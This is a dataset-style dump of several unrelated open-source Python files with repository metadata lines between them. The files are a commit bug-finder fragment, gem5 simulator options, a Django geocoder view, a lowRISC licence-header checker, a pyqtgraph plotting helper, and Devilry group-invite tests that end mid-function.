correctiveFiles = correctiveCommit.fileschanged.split(",CAS_DELIMITER,")
else:
correctiveFiles = json.loads(correctiveCommit.fileschanged)
for commit in self.allCommits:
if int(commit.author_date_unix_timestamp) < int(bug_introduced_prior):
if 'CAS_DELIMITER' in commit.fileschanged:
# Provide legacy support for the previous fileschanged format
commitFiles = commit.fileschanged.split(",CAS_DELIMITER,")
else:
commitFiles = json.loads(commit.fileschanged)
for commitFile in commitFiles:
# This introudced the bug!
if commitFile in correctiveFiles:
return commit
return -1 # Not found
def markBuggyCommits(self):
"""
Finds bug inducing commits based on those that are
bug fixing. It checks commits prior to this and determines
it to be bug inducing if it changes the same file in a bug fixing
commit
"""
for correctiveCommit in self.correctiveCommits:
buggyCommit = self.searchForBuggyCommit(correctiveCommit)
if buggyCommit is not -1:
buggyCommit.contains_bug = True
#else:
#print("Cound not find the bug inducing commit for: " +
# correctiveCommit.commit_message)
| mit | 9,136,406,733,710,434,000 | 30.241379 | 88 | 0.737307 | false |
danielpalomino/gem5 | configs/common/Options.py | 1 | 10060 | # Copyright (c) 2006-2008 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Lisa Hsu
import m5
from m5.defines import buildEnv
from m5.objects import *
from Benchmarks import *
def addCommonOptions(parser):
# system options
parser.add_option("--cpu-type", type="choice", default="atomic",
choices = ["atomic", "timing", "detailed", "inorder",
"arm_detailed"],
help = "type of cpu to run with")
parser.add_option("--checker", action="store_true");
parser.add_option("-n", "--num-cpus", type="int", default=1)
parser.add_option("--caches", action="store_true")
parser.add_option("--l2cache", action="store_true")
parser.add_option("--fastmem", action="store_true")
parser.add_option("--clock", action="store", type="string", default='2GHz')
parser.add_option("--num-dirs", type="int", default=1)
parser.add_option("--num-l2caches", type="int", default=1)
parser.add_option("--num-l3caches", type="int", default=1)
parser.add_option("--l1d_size", type="string", default="64kB")
parser.add_option("--l1i_size", type="string", default="32kB")
parser.add_option("--l2_size", type="string", default="2MB")
parser.add_option("--l3_size", type="string", default="16MB")
parser.add_option("--l1d_assoc", type="int", default=2)
parser.add_option("--l1i_assoc", type="int", default=2)
parser.add_option("--l2_assoc", type="int", default=8)
parser.add_option("--l3_assoc", type="int", default=16)
parser.add_option("--cacheline_size", type="int", default=64)
parser.add_option("--ruby", action="store_true")
# Run duration options
parser.add_option("-m", "--maxtick", type="int", default=m5.MaxTick,
metavar="T", help="Stop after T ticks")
parser.add_option("--maxtime", type="float")
parser.add_option("-I", "--maxinsts", action="store", type="int",
default=None, help="""Total number of instructions to
simulate (default: run forever)""")
parser.add_option("--work-item-id", action="store", type="int",
help="the specific work id for exit & checkpointing")
parser.add_option("--work-begin-cpu-id-exit", action="store", type="int",
help="exit when work starts on the specified cpu")
parser.add_option("--work-end-exit-count", action="store", type="int",
help="exit at specified work end count")
parser.add_option("--work-begin-exit-count", action="store", type="int",
help="exit at specified work begin count")
parser.add_option("--init-param", action="store", type="int", default=0,
help="""Parameter available in simulation with m5
initparam""")
# Checkpointing options
###Note that performing checkpointing via python script files will override
###checkpoint instructions built into binaries.
parser.add_option("--take-checkpoints", action="store", type="string",
help="<M,N> will take checkpoint at cycle M and every N cycles thereafter")
parser.add_option("--max-checkpoints", action="store", type="int",
help="the maximum number of checkpoints to drop", default=5)
parser.add_option("--checkpoint-dir", action="store", type="string",
help="Place all checkpoints in this absolute directory")
parser.add_option("-r", "--checkpoint-restore", action="store", type="int",
help="restore from checkpoint <N>")
parser.add_option("--checkpoint-at-end", action="store_true",
help="take a checkpoint at end of run")
parser.add_option("--work-begin-checkpoint-count", action="store", type="int",
help="checkpoint at specified work begin count")
parser.add_option("--work-end-checkpoint-count", action="store", type="int",
help="checkpoint at specified work end count")
parser.add_option("--work-cpus-checkpoint-count", action="store", type="int",
help="checkpoint and exit when active cpu count is reached")
parser.add_option("--restore-with-cpu", action="store", type="choice",
default="atomic", choices = ["atomic", "timing",
"detailed", "inorder"],
help = "cpu type for restoring from a checkpoint")
# CPU Switching - default switch model goes from a checkpoint
# to a timing simple CPU with caches to warm up, then to detailed CPU for
# data measurement
parser.add_option("--repeat-switch", action="store", type="int",
default=None,
help="switch back and forth between CPUs with period <N>")
parser.add_option("-s", "--standard-switch", action="store", type="int",
default=None,
help="switch from timing to Detailed CPU after warmup period of <N>")
parser.add_option("-p", "--prog-interval", type="int",
help="CPU Progress Interval")
# Fastforwarding and simpoint related materials
parser.add_option("-W", "--warmup-insts", action="store", type="int",
default=None,
help="Warmup period in total instructions (requires --standard-switch)")
parser.add_option("--bench", action="store", type="string", default=None,
help="base names for --take-checkpoint and --checkpoint-restore")
parser.add_option("-F", "--fast-forward", action="store", type="string",
default=None,
help="Number of instructions to fast forward before switching")
parser.add_option("-S", "--simpoint", action="store_true", default=False,
help="""Use workload simpoints as an instruction offset for
--checkpoint-restore or --take-checkpoint.""")
parser.add_option("--at-instruction", action="store_true", default=False,
help="""Treat value of --checkpoint-restore or --take-checkpoint as a
number of instructions.""")
def addSEOptions(parser):
# Benchmark options
parser.add_option("-c", "--cmd", default="",
help="The binary to run in syscall emulation mode.")
parser.add_option("-o", "--options", default="",
help="""The options to pass to the binary, use " "
around the entire string""")
parser.add_option("-i", "--input", default="",
help="Read stdin from a file.")
parser.add_option("--output", default="",
help="Redirect stdout to a file.")
parser.add_option("--errout", default="",
help="Redirect stderr to a file.")
def addFSOptions(parser):
# Simulation options
parser.add_option("--timesync", action="store_true",
help="Prevent simulated time from getting ahead of real time")
# System options
parser.add_option("--kernel", action="store", type="string")
parser.add_option("--script", action="store", type="string")
parser.add_option("--frame-capture", action="store_true",
help="Stores changed frame buffers from the VNC server to compressed "\
"files in the gem5 output directory")
if buildEnv['TARGET_ISA'] == "arm":
parser.add_option("--bare-metal", action="store_true",
help="Provide the raw system without the linux specific bits")
parser.add_option("--machine-type", action="store", type="choice",
choices=ArmMachineType.map.keys(), default="RealView_PBX")
# Benchmark options
parser.add_option("--dual", action="store_true",
help="Simulate two systems attached with an ethernet link")
parser.add_option("-b", "--benchmark", action="store", type="string",
dest="benchmark",
help="Specify the benchmark to run. Available benchmarks: %s"\
% DefinedBenchmarks)
# Metafile options
parser.add_option("--etherdump", action="store", type="string", dest="etherdump",
help="Specify the filename to dump a pcap capture of the" \
"ethernet traffic")
# Disk Image Options
parser.add_option("--disk-image", action="store", type="string", default=None,
help="Path to the disk image to use.")
# Memory Size Options
parser.add_option("--mem-size", action="store", type="string", default=None,
help="Specify the physical memory size (single memory)")
| bsd-3-clause | -2,901,236,696,301,935,600 | 54.274725 | 85 | 0.633996 | false |
BILS/agda | agda/species_geo_coder/views.py | 1 | 2551 | import time
#from django.shortcuts import render
from django.views.generic import TemplateView, FormView
from django.shortcuts import redirect, render
from django.db import transaction
from agda.views import package_template_dict
from jobs.models import (JOB_STATUS_LEVEL_ACCEPTED,
JOB_STATUS_LEVEL_FINISHED,
get_job_or_404)
from species_geo_coder.models import app_package, SpeciesGeoCoderJob
from species_geo_coder.forms import SpeciesGeoCoderForm
from species_geo_coder.models import tool_1
# Create your views here.
class IndexView(TemplateView):
template_name = 'species_geo_coder/index.html'
def get_context_data(self, *args, **kw):
context = super(IndexView, self).get_context_data(**kw)
return package_template_dict(self.request, app_package, *args, **kw)
class ToolView(FormView):
template_name = 'species_geo_coder/speciesgeocoder.html'
form_class = SpeciesGeoCoderForm
@transaction.atomic
def form_valid(self, form):
request = self.request
## These are all generic, should be extracted to a main class
job = SpeciesGeoCoderJob(status=JOB_STATUS_LEVEL_ACCEPTED)
job.save()
job = SpeciesGeoCoderJob.objects.select_for_update().get(pk=job.id)
job.log_create(request.user, 'Created in web interface.')
verbose = form.cleaned_data['verbose']
occurences = form.cleaned_data['occurences']
plot = form.cleaned_data['plot']
job.submit(request.user, request.META['REMOTE_ADDR'], form.cleaned_data['name'],
self.request.FILES, occurences, verbose, plot)
return redirect('jobs.views.show_results', job.slug)
@transaction.atomic
def tool_1_results(request, slug):
job = get_job_or_404(slug=slug, select_for_update=True)
job.update_status(request.user)
params = dict(job=job, tool=tool_1)
if job.is_alive:
reload_time, interval = request.session.setdefault('mdrscan', dict()).pop(job.slug, (0, 5))
if reload_time <= time.time():
reload_time = max(time.time() + 5, reload_time + interval)
interval *= 2
request.session['mdrscan'][job.slug] = (reload_time, interval)
request.session.modified = True
params.update(timeout=reload_time - time.time())
params.update(reload_time=reload_time, interval=interval)
return render(request, 'species_geo_coder/results.html', params)
#class ToolResultView(TemplateView):
# template_name = '<app>/tool_result.html'
| mit | 1,003,078,452,284,598,300 | 38.246154 | 99 | 0.681693 | false |
lowRISC/manticore | util/license-checker.py | 2 | 17721 | #!/usr/bin/env python3
#
# Copyright lowRISC contributors.
# Licensed under the Apache License, Version 2.0, see LICENSE for details.
# SPDX-License-Identifier: Apache-2.0
import argparse
import fnmatch
import logging
import re
import subprocess
from pathlib import Path
from types import SimpleNamespace
import hjson
from tabulate import tabulate
class LicenceHeader(object):
"""Represents the licence header we want to insert"""
def __init__(self, text):
self._lines = text.strip().splitlines()
def __getitem__(self, idx):
return self._lines.__getitem__(idx)
def __len__(self):
return self._lines.__len__()
def numbered_lines(self, skip=0):
"""Returns an iterator of (line_no, line_text).
`line_no` counts from 1, and is for humans to count line numbers with.
use `skip_lines` to skip enumerating the first few lines.
"""
return enumerate(self._lines[skip:], start=1 + skip)
@property
def first_word(self):
(first_word, _) = self._lines[0].split(' ', 1)
return first_word
class CommentStyle:
'''Base class for comment style objects'''
def __init__(self, first_line_prefix, comment_prefix):
self.first_line_prefix = first_line_prefix
self.comment_prefix = comment_prefix
def search_line_pattern(self, licence_first_word):
return re.compile(
re.escape(self.comment_prefix + ' ' + licence_first_word))
def full_line_parts(self, licence_line):
return [re.escape(self.comment_prefix), licence_line]
def full_line_pattern(self, licence_line):
'''Returns a regex pattern which matches one line of licence text.'''
return re.compile(' '.join(self.full_line_parts(licence_line)))
class LineCommentStyle(CommentStyle):
"""Helpers for line-style comments."""
def __init__(self, prefix):
super().__init__(prefix, prefix)
class DifferentFirstLineCommentStyle(CommentStyle):
"""Some files have a different allowable prefix for their first line."""
def __init__(self, first_line_prefix, prefix):
super().__init__(first_line_prefix, prefix)
class BlockCommentStyle(CommentStyle):
"""Helpers for block-style comments."""
def __init__(self, prefix, suffix):
super().__init__(prefix, prefix)
self.comment_suffix = str(suffix)
def full_line_parts(self, licence_line):
return [
re.escape(self.comment_prefix), licence_line,
re.escape(self.comment_suffix)
]
SLASH_SLASH = '//'
HASH = '#'
SLASH_STAR = '/*'
COMMENT_STYLES = {
SLASH_SLASH: LineCommentStyle("//"),
HASH: LineCommentStyle("#"),
SLASH_STAR: BlockCommentStyle("/*", "*/"),
'corefile': DifferentFirstLineCommentStyle("CAPI=2", "#")
}
# (Prioritised) Mapping of file name suffixes to comment style. If the suffix
# of your file does not match one of these, it will not be checked.
#
# Each entry is a pair (suffixes, styles). suffixes is a list of file suffixes:
# if a filename matches one of these suffixes, we'll use the styles in styles.
# styles is either a string or a list of strings. If there is one or more
# strings, these strings must all be keys of COMMENT_STYLES and they give the
# different comment styles that are acceptable for the file type.
#
# These rules are given in priority order. Tuples higher in the list are
# matched before those later in the list, on purpose.
#
# Files that either do not match any extension or that have an empty list of
# styles are not checked for a licence.
COMMENT_CHARS = [
# Hardware Files
([".svh", ".sv", ".sv.tpl"], SLASH_SLASH), # SystemVerilog
# Hardware Build Systems
([".tcl", ".sdc"], HASH), # tcl
([".core", ".core.tpl"], 'corefile'), # FuseSoC Core Files
(["Makefile", ".mk"], HASH), # Makefiles
([".ys"], HASH), # Yosys script
([".waiver"], HASH), # AscentLint waiver files
([".vlt"], SLASH_SLASH), # Verilator configuration (waiver) files
([".vbl"], HASH), # Verible configuration files
([".el", ".el.tpl"], SLASH_SLASH), # Exclusion list
([".cfg", ".cfg.tpl"], [SLASH_SLASH,
HASH]), # Kinds of configuration files
([".f"], []), # File lists (not checked)
# The following two rules will inevitably bite us.
(["riviera_run.do"], HASH), # Riviera dofile
([".do"], SLASH_SLASH), # Cadence LEC dofile
# Software Files
([".c", ".c.tpl", ".h", ".h.tpl", ".cc", ".cpp"], SLASH_SLASH), # C, C++
([".def"], SLASH_SLASH), # C, C++ X-Include List Declaration Files
([".S"], [SLASH_SLASH, SLASH_STAR]), # Assembly (With Preprocessing)
([".s"], SLASH_STAR), # Assembly (Without Preprocessing)
([".ld", ".ld.tpl"], SLASH_STAR), # Linker Scripts
([".rs", ".rs.tpl"], SLASH_SLASH), # Rust
# Software Build Systems
(["meson.build", "toolchain.txt", "meson_options.txt"], HASH), # Meson
# General Tooling
([".py"], HASH), # Python
([".sh"], HASH), # Shell Scripts
(["Dockerfile"], HASH), # Dockerfiles
# Configuration
([".hjson", ".hjson.tpl"], SLASH_SLASH), # hjson
([".yml", ".yaml"], HASH), # YAML
([".toml"], HASH), # TOML
(["-requirements.txt"], HASH), # Apt and Python requirements files
(["redirector.conf"], HASH), # nginx config
# Documentation
([".md", ".md.tpl", ".html"], []), # Markdown and HTML (not checked)
([".css"], SLASH_STAR), # CSS
([".scss"], SLASH_SLASH), # SCSS
# Templates (Last because there are overlaps with extensions above)
([".tpl"], HASH), # Mako templates
]
class LicenceMatcher:
'''An object to match a given licence at the start of a file'''
def __init__(self, comment_style, licence, match_regex):
self.style = comment_style
self.expected_lines = list()
# In case we are using regex matching we can pass the full line "as is"
if match_regex:
for i, ll in enumerate(licence):
try:
self.expected_lines.append(
comment_style.full_line_pattern(ll))
# Catch any regex error here and raise a runtime error.
except re.error as e:
raise RuntimeError(
"Can't compile line {} of the licence as a regular expression. Saw `{}`: {}"
.format(i, e.pattern[e.pos], e.msg))
# use the "first line" as a licence marker
self.search_marker = self.expected_lines[0]
# For non-regex matching we need to escape everything.
# This can never throw an exception as everything has been escaped and
# therefore is always a legal regex.
else:
self.search_marker = comment_style.search_line_pattern(
licence.first_word)
self.expected_lines = [
comment_style.full_line_pattern(re.escape(ll))
for ll in licence
]
self.lines_left = []
def looks_like_first_line_comment(self, line):
return line.startswith(self.style.first_line_prefix)
def looks_like_comment(self, line):
return line.startswith(self.style.comment_prefix)
def looks_like_first_line(self, line):
return self.search_marker.match(line) is not None
def start(self):
'''Reset lines_left, to match at the start of the licence'''
self.lines_left = self.expected_lines
def take_line(self, line):
'''Check whether line matches the next line of the licence.
Returns a pair (matched, done). matched is true if the line matched. If
this was the last line of the licence, done is true. On a match, this
increments an internal counter, so the next call to take_line will
match against the next line of the licence.
'''
# If we have no more lines to match, claim a match and that we're done.
# This shouldn't happen in practice, except if the configuration has an
# empty licence.
if not self.lines_left:
return (True, True)
next_expected = self.lines_left[0]
matched = next_expected.fullmatch(line)
if not matched:
return (False, False)
if matched:
self.lines_left = self.lines_left[1:]
return (True, not self.lines_left)
def detect_comment_char(all_matchers, filename):
'''Find zero or more LicenceMatcher objects for filename
all_matchers should be a dict like COMMENT_STYLES, but where the values are
the corresponding LicenceMatcher objects.
'''
found = None
for (suffixes, keys) in COMMENT_CHARS:
if found is not None:
break
for suffix in suffixes:
if filename.endswith(suffix):
found = keys
break
if found is None:
return []
if not isinstance(found, list):
assert isinstance(found, str)
found = [found]
return [all_matchers[key] for key in found]
def git_find_repo_toplevel():
git_output = subprocess.check_output(
['git', 'rev-parse', '--show-toplevel'])
return Path(git_output.decode().strip()).resolve()
def git_find_all_file_paths(top_level, search_paths):
git_output = subprocess.check_output(
["git", "-C",
str(top_level), "ls-files", "-z", "--", *search_paths])
for path in git_output.rstrip(b"\0").split(b"\0"):
yield Path(top_level, path.decode())
class ResultsTracker(object):
"""Helper for tracking results"""
def __init__(self, base_dir):
self.base_dir = base_dir
passed_count = 0
failed_count = 0
excluded_count = 0
skipped_count = 0
failing_paths = set()
@property
def total_count(self):
return (self.passed_count + self.failed_count + self.skipped_count +
self.excluded_count)
def passed(self, path, line_no, reason):
rel_path = path.relative_to(self.base_dir)
logging.debug("%s:%d PASSED: %s", str(rel_path), line_no, reason)
self.passed_count += 1
def failed(self, path, line_no, reason):
rel_path = path.relative_to(self.base_dir)
logging.error("%s:%d FAILED: %s", str(rel_path), line_no, reason)
self.failing_paths.add(rel_path)
self.failed_count += 1
def skipped(self, path, reason):
rel_path = path.relative_to(self.base_dir)
logging.info("%s: SKIPPED: %s", str(rel_path), reason)
self.skipped_count += 1
def excluded(self, path, reason):
rel_path = path.relative_to(self.base_dir)
logging.debug("%s: EXCLUDED: %s", str(rel_path), reason)
self.excluded_count += 1
def any_failed(self):
return self.failed_count > 0
def display_nicely(self):
headers = ["Results:", "Files"]
results = [["Passed", self.passed_count],
["Failed", self.failed_count],
["Skipped", self.skipped_count],
["Excluded", self.excluded_count],
["Total", self.total_count]]
return tabulate(results, headers, tablefmt="simple")
def matches_exclude_pattern(config, file_path):
rel_path = str(file_path.relative_to(config.base_dir))
for exclude_pattern in config.exclude_paths:
if fnmatch.fnmatch(rel_path, exclude_pattern):
return True
return False
def check_paths(config, git_paths):
results = ResultsTracker(config.base_dir)
try:
all_matchers = {
key: LicenceMatcher(style, config.licence, config.match_regex)
for key, style in COMMENT_STYLES.items()
}
except RuntimeError as e:
exit(e)
for filepath in git_find_all_file_paths(config.base_dir, git_paths):
# Skip symlinks (with message)
if filepath.is_symlink():
results.excluded(filepath, "File is a symlink")
continue
# Skip non-file
if not filepath.is_file():
continue
# Skip exclude patterns
if matches_exclude_pattern(config, filepath):
results.excluded(filepath, "Path matches exclude pattern")
continue
check_file_for_licence(all_matchers, results, filepath)
return results
def check_file_for_licence(all_matchers, results, filepath):
matchers = detect_comment_char(all_matchers, filepath.name)
if not matchers:
results.skipped(filepath, "Unknown comment style")
return
if filepath.stat().st_size == 0:
results.skipped(filepath, "Empty file")
return
problems = []
for matcher in matchers:
good, line_num, msg = check_file_with_matcher(matcher, filepath)
if good:
results.passed(filepath, line_num, msg)
return
else:
problems.append((line_num, msg))
# If we get here, we didn't find a matching licence
for line_num, msg in problems:
results.failed(filepath, line_num, msg)
def check_file_with_matcher(matcher, filepath):
'''Check the file at filepath against matcher.
Returns a tuple (is_good, line_number, msg). is_good is True on success;
False on failure. line_number is the position where the licence was found
(on success) or where we gave up searching for it (on failure). msg is the
associated success or error message.
'''
def next_line(file, line_no):
return (next(file).rstrip(), line_no + 1)
with filepath.open() as f:
licence_assumed_start = None
# Get first line
try:
line, line_no = next_line(f, 0)
except StopIteration:
return (False, 1, "Empty file")
# Check first line against the first word of licence, or against a
# possible different first line.
if not matcher.looks_like_first_line(line):
if not matcher.looks_like_first_line_comment(line):
return (False, line_no, "File does not start with comment")
try:
line, line_no = next_line(f, line_no)
except StopIteration:
return (False, line_no,
"Reached end of file before finding licence")
# Skip lines that don't seem to be the first line of the licence
while not matcher.looks_like_first_line(line):
try:
line, line_no = next_line(f, line_no)
except StopIteration:
return (False, line_no,
"Reached end of file before finding licence")
if not matcher.looks_like_comment(line):
return (False, line_no,
"First comment ended before licence notice")
# We found the marker, so we found the first line of the licence. The
# current line is in the first comment, so check the line matches the
# expected first line:
licence_assumed_start = line_no
matcher.start()
matched, done = matcher.take_line(line)
if not matched:
return (False, line_no, "Licence does not match")
while not done:
try:
line, line_no = next_line(f, line_no)
except StopIteration:
return (False, line_no,
"Reached end of file before finding licence")
# Check against full expected line.
matched, done = matcher.take_line(line)
if not matched:
return (False, line_no, "Licence did not match")
return (True, licence_assumed_start, "Licence found")
def main():
desc = "A tool to check the lowRISC licence header is in each source file"
parser = argparse.ArgumentParser(description=desc)
parser.add_argument("--config",
metavar="config.hjson",
type=argparse.FileType('r', encoding='UTF-8'),
required=True,
help="HJSON file to read for licence configuration.")
parser.add_argument("paths",
metavar="path",
nargs='*',
default=["."],
help="Paths to check for licence headers.")
parser.add_argument('-v',
"--verbose",
action='store_true',
dest='verbose',
help="Verbose output")
options = parser.parse_args()
if options.verbose:
logging.basicConfig(format="%(levelname)s: %(message)s",
level=logging.INFO)
else:
logging.basicConfig(format="%(levelname)s: %(message)s")
config = SimpleNamespace()
config.base_dir = git_find_repo_toplevel()
parsed_config = hjson.load(options.config)
config.licence = LicenceHeader(parsed_config['licence'])
config.exclude_paths = set(parsed_config['exclude_paths'])
# Check whether we should use regex matching or full string matching.
match_regex = parsed_config.get('match_regex', 'false')
if match_regex not in ['true', 'false']:
print('Invalid value for match_regex: {!r}. '
'Should be "true" or "false".'.format(match_regex))
exit(1)
config.match_regex = match_regex == 'true'
results = check_paths(config, options.paths)
print(results.display_nicely())
if results.any_failed():
print("Failed:")
for path in results.failing_paths:
print(" {}".format(str(path)))
print("")
exit(1)
else:
exit(0)
if __name__ == '__main__':
main()
| apache-2.0 | -6,870,868,201,439,118,000 | 33.276596 | 100 | 0.596524 | false |
jithinbp/vLabtool-v0 | v0/utilitiesClass.py | 1 | 2985 | import time,random,functools
import numpy as np
from PyQt4 import QtCore, QtGui
import pyqtgraph as pg
import pyqtgraph.opengl as gl
class utilitiesClass():
"""
This class contains methods that simplify setting up and running
an experiment.
"""
timers=[]
viewBoxes=[]
plots3D=[]
plots2D=[]
axisItems=[]
total_plot_areas=0
def __init__(self):
pass
def updateViews(self,plot):
for a in plot.viewBoxes:
a.setGeometry(plot.getViewBox().sceneBoundingRect())
a.linkedViewChanged(plot.plotItem.vb, a.XAxis)
def random_color(self):
c=QtGui.QColor(random.randint(20,255),random.randint(20,255),random.randint(20,255))
if np.average(c.getRgb())<150:
c=self.random_color()
return c
def add2DPlot(self,plot_area):
plot=pg.PlotWidget()
plot.setMinimumHeight(250)
plot_area.addWidget(plot)
plot.viewBoxes=[]
self.plots2D.append(plot)
return plot
def add3DPlot(self,plot_area):
plot3d = gl.GLViewWidget()
#gx = gl.GLGridItem();gx.rotate(90, 0, 1, 0);gx.translate(-10, 0, 0);self.plot.addItem(gx)
#gy = gl.GLGridItem();gy.rotate(90, 1, 0, 0);gy.translate(0, -10, 0);self.plot.addItem(gy)
gz = gl.GLGridItem();#gz.translate(0, 0, -10);
plot3d.addItem(gz);
plot3d.opts['distance'] = 40
plot3d.opts['elevation'] = 5
plot3d.opts['azimuth'] = 20
plot3d.setMinimumHeight(250)
plot_area.addWidget(plot3d)
self.plots3D.append(plot3d)
plot3d.plotLines3D=[]
return plot3d
def addCurve(self,plot,name='',col=(255,255,255),axis='left'):
#if(len(name)):curve = plot.plot(name=name)
#else:curve = plot.plot()
if(len(name)):curve = pg.PlotCurveItem(name=name)
else:curve = pg.PlotCurveItem()
plot.addItem(curve)
curve.setPen(color=col, width=1)
return curve
def rebuildLegend(self,plot):
return plot.addLegend(offset=(-10,30))
def addAxis(self,plot,**args):
p3 = pg.ViewBox()
ax3 = pg.AxisItem('right')
plot.plotItem.layout.addItem(ax3, 2, 3+len(self.axisItems))
plot.plotItem.scene().addItem(p3)
ax3.linkToView(p3)
p3.setXLink(plot.plotItem)
ax3.setZValue(-10000)
if args.get('label',False):
ax3.setLabel(args.get('label',False), color=args.get('color','#ffffff'))
plot.viewBoxes.append(p3)
p3.setGeometry(plot.plotItem.vb.sceneBoundingRect())
p3.linkedViewChanged(plot.plotItem.vb, p3.XAxis)
## Handle view resizing
Callback = functools.partial(self.updateViews,plot)
plot.getViewBox().sigStateChanged.connect(Callback)
self.axisItems.append(ax3)
return p3
def loopTask(self,interval,func,*args):
timer = QtCore.QTimer()
timerCallback = functools.partial(func,*args)
timer.timeout.connect(timerCallback)
timer.start(interval)
self.timers.append(timer)
return timer
def delayedTask(self,interval,func,*args):
timer = QtCore.QTimer()
timerCallback = functools.partial(func,*args)
timer.singleShot(interval,timerCallback)
self.timers.append(timer)
def displayDialog(self,txt=''):
QtGui.QMessageBox.about(self, 'Message', txt)
| gpl-3.0 | -7,986,475,858,903,219,000 | 25.651786 | 92 | 0.710218 | false |
devilry/devilry-django | devilry/apps/core/tests/test_groupinvite.py | 1 | 24874 | from django.core import mail
from django.core.exceptions import ValidationError
from django.test import TestCase
from django.utils import timezone
from django.utils.timezone import timedelta
from django.urls import reverse
from model_bakery import baker
from devilry.apps.core import devilry_core_baker_factories as core_baker
from devilry.apps.core.models import AssignmentGroup
from devilry.apps.core.models import GroupInvite
from devilry.devilry_dbcache.customsql import AssignmentGroupDbCacheCustomSql
class TestGroupInviteErrors(TestCase):
def setUp(self):
AssignmentGroupDbCacheCustomSql().initialize()
def test_user_sending_is_not_part_of_the_group(self):
testgroup = baker.make('core.AssignmentGroup')
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
testgroup2 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup1).relatedstudent.user
sent_to = core_baker.candidate(testgroup2).relatedstudent.user
with self.assertRaisesMessage(
ValidationError,
'The user sending an invite must be a Candiate on the group.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
def test_student_already_member_of_the_group(self):
testgroup = baker.make('core.AssignmentGroup')
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup).relatedstudent.user
with self.assertRaisesMessage(
ValidationError,
'The student is already a member of the group.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
def test_student_already_invited_but_not_responded(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
baker.make('core.GroupInvite', group=testgroup, sent_by=sent_by, sent_to=sent_to)
with self.assertRaisesMessage(
ValidationError,
'The student is already invited to join the group, but they have not responded yet.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
def test_create_groups_expired(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__students_can_create_groups=True,
parentnode__students_can_not_create_groups_after=timezone.now() - timedelta(days=1))
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
with self.assertRaisesMessage(
ValidationError,
'Creating project groups without administrator approval is not '
'allowed on this assignment anymore. Please contact you course '
'administrator if you think this is wrong.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
def test_assignment_does_not_allow_students_to_form_groups(self):
testgroup = baker.make('core.AssignmentGroup',
parentnode__students_can_create_groups=False)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
with self.assertRaisesMessage(
ValidationError,
'This assignment does not allow students to form project groups on their own.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
def test_student_sent_to_is_not_registerd_on_assignment(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup')
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
with self.assertRaisesMessage(
ValidationError,
'The invited student is not registered on this assignment.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to
)
invite.full_clean()
def test_student_sent_to_is_already_in_a_group_with_more_than_one_student(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
sent_to = core_baker.candidate(testgroup1).relatedstudent.user
core_baker.candidate(testgroup1)
with self.assertRaisesMessage(
ValidationError,
'The invited student is already in a project group with more than 1 students.'):
invite = baker.make(
'core.GroupInvite',
group=testgroup,
sent_by=sent_by,
sent_to=sent_to,
accepted=True
)
invite.full_clean()
def test_sanity(self):
testgroup = baker.make('core.AssignmentGroup', parentnode__students_can_create_groups=True)
testgroup1 = baker.make('core.AssignmentGroup', parentnode=testgroup.parentnode)
sent_by = core_baker.candidate(testgroup).relatedstudent.user
